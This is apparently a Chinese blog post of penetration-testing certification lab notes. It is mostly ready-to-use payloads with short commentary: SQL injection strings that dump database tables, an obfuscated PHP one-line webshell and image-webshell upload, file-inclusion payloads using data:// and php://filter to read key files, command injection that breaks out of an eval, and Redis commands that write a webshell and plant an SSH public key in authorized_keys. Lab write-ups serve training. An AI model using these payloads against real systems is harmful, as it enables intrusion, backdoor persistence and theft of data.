前言
翻了翻之前的笔记,还有这个没分享,一次性都发出来吧,似乎从前年8月份认证环境也有改版,TE和TS操作机应该都换成了WIN10吧
SQL注入
注册后登录
data:image/s3,"s3://crabby-images/d75c3/d75c345f59c16eb8089d29c25ac54bafb0890e7f" alt=""
用户名为e
data:image/s3,"s3://crabby-images/b1bdc/b1bdc97f63fed1c76eb9c41e0c0685394ddba08c" alt=""
观察插入的字段内容,构造payload
a','e'),('1',(select database()),'1
data:image/s3,"s3://crabby-images/da540/da540b5c38c79defda62933337d9182e91695cd1" alt=""
拿到数据库2web
data:image/s3,"s3://crabby-images/a47ee/a47ee2a5d8432ee8d4f95ed13857c3f3b1230d42" alt=""
爆表
a','e'),('1',(select group_concat(table_name) from information_schema.tables where table_schema='2web'),'1
data:image/s3,"s3://crabby-images/49ca3/49ca395937cf9e85fa865d1ebe8a83386959adfb" alt=""
爆列
data:image/s3,"s3://crabby-images/08118/081187083cab4462e5790ed5076366a668fa95d5" alt=""
爆出表的所有字段,读内容
文件上传
http://150.158.27.164:82/
上传图片马
copy 1.jpg/b+1.php/a 2.jpg
抓包直接上传,修改文件名为4.php
data:image/s3,"s3://crabby-images/98196/98196806c6e002ca0cefea2ccb10a0c219f12704" alt=""
内容过滤,免杀马,免杀一句话
<?php array_map("arr\x65rt",(array)$_REQUEST['a']); ?>
连接查看文件读取key
data:image/s3,"s3://crabby-images/49c40/49c403115d85f4868e240aedc029a9b97232f14d" alt=""
文件包含
http://150.158.27.164:83/start/index.php?page=dadata://ta://text/plain,%3C?php%20print_r(scandir(%27..%27));?%3E
data:image/s3,"s3://crabby-images/97948/97948e34a14d13d0bb4121ec581ea9ab6238e7cb" alt=""
payload
?page=datadata://://text/plain,<?php%20print_r(scandir(%27..%27));?>
?page=dadata://ta://text/plain,<?php%20print_r(scandir(%27..%27));?>
读取key.php
?page=datadata://://text/plain,<?php%20print_r(system(%27cat%20../key.php%27));?>
data:image/s3,"s3://crabby-images/02b1b/02b1bf9659a651380af4ac407009770dfc34c165" alt=""
反序列化
paylaod
data:image/s3,"s3://crabby-images/83c48/83c482248103bf920fc5a79dcf36184275b3b7f4" alt=""
SQL注入
http://150.158.27.164:1081
这里将空格过滤掉了
data:image/s3,"s3://crabby-images/a9258/a9258c89e7b22f69cf29fb0b330eaa7cb7e64962" alt=""
修改payload
a','as'),('a',(select/**/database()),'1
data:image/s3,"s3://crabby-images/3095e/3095ebe2a00e4ca4ddd8e2e9cb42f3b80bad2021" alt=""
其余的都一样,直接查表查字段读取key
a','as'),('a',(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='2web'),'1
data:image/s3,"s3://crabby-images/da9b1/da9b1bd25dae3e3d99ed72ce0f248434c6a034d6" alt=""
a','as'),('a',(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='users1'),'1
data:image/s3,"s3://crabby-images/06260/0626099078df507017da4143d2767b9caa700801" alt=""
a','as'),('a',(select/**/group_concat(XremarkX4354)/**/from/**/users1),'1
data:image/s3,"s3://crabby-images/9c478/9c478a897a110aecf3ea2cd5fd259c4163a06f55" alt=""
文件包含
data:image/s3,"s3://crabby-images/97ff5/97ff52d4b401d2dc69fb73b01d4be584f66cba21" alt=""
payload
?page=phpphp://://filter/read=convert.base64-encode/resource=../key.php
data:image/s3,"s3://crabby-images/c3361/c3361c795d33a6f37028e27ebb31bc725f070d97" alt=""
命令执行
<?php
error_reporting(0);
include "key4.php
$a=$ GET['a'];
eval("\$o=strtolower(\"$a\");")
echo$o
show_source(_FILE_);
闭合掉前面的函数,然后执行system函数内容,payload如下
?a=1");system('ls');/*
或者
?a=1");system('ls');//
data:image/s3,"s3://crabby-images/29ecf/29ecff34f1d044b52afc4a089139c7c81aa81211" alt=""
?a=1");system('cat key4.php');//
data:image/s3,"s3://crabby-images/b163b/b163b2ef32154f100afaf02cf69ba5894710e9a8" alt=""
SQL注入
data:image/s3,"s3://crabby-images/01560/01560f95e0ecbbe90904f3855d17a4b2a3985dae" alt=""
(like "%'-1'%") union select 1,2,database() #'%")
读库读key
文件包含
http://192.168.100.130/PTE/3.File_Include/vulnerabilities/fu1.php?file=view.html
访问
http://192.168.100.130/PTE/3.File_Include/vulnerabilities/view.html
data:image/s3,"s3://crabby-images/da9b9/da9b9701ea70081ba39a902b05f4347ec1993b5c" alt=""
直接构造传参
Hello=1&z0=c3lzdGVtKCd0eXBlIGM6XFxrZXkucGhwJyk7
data:image/s3,"s3://crabby-images/6e24b/6e24b407695eb4d022c0a33ed8b6a2eb5178f167" alt=""
出key
综合
redis未授权 写入公钥,写入shell,redis端口探测到为6378,非默认端口,获取网站的绝对路径
/var/www/html/app1
法一写shell
flushall 清空
config set dir /var/www/html/app1
config set dbfilename w.php 设置shell的名字
set x "<?php eval($_POST['a']);?>" 写入一句话
save保存
法二写公钥
flushall
config set dir /root/.ssh 设置路径
config set dbfilename authorized_keys
set a "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAyuBEjKEv +DxEGgtvMjSlj125Pw77BiF7qaa1rud4Lbu09FCqT5x7XItSBS08LghYvzROv8O0BWFLILkOMC8ZBGgNuWE1LPTMps45wJ4PWC8uW5UQ54v VDDQf4Xfe4ohKn8p6BeWvDWzqOrZS +Rw9jsg53AImPDFZ4+SZ2Hu4Alnd35ec7lrX6rmFBs7JLGXT34p2pOyh4v9WSeBg1yKsxUw0jgzOa6qiV1H8hysoPvQTAcZqy/FGIxdorDVPwr hOGutsVwZCIB8SL41uzCa/uIEdYjjx0sTexVamGLKo++fOYhuaEXboeMhgaRPDhM+/0TaTdJt0mBlpldKklwqbMQ==\n\n\n"
save
get a
data:image/s3,"s3://crabby-images/0390c/0390c9ffe9f666d7829768ffa22443058fa00355" alt=""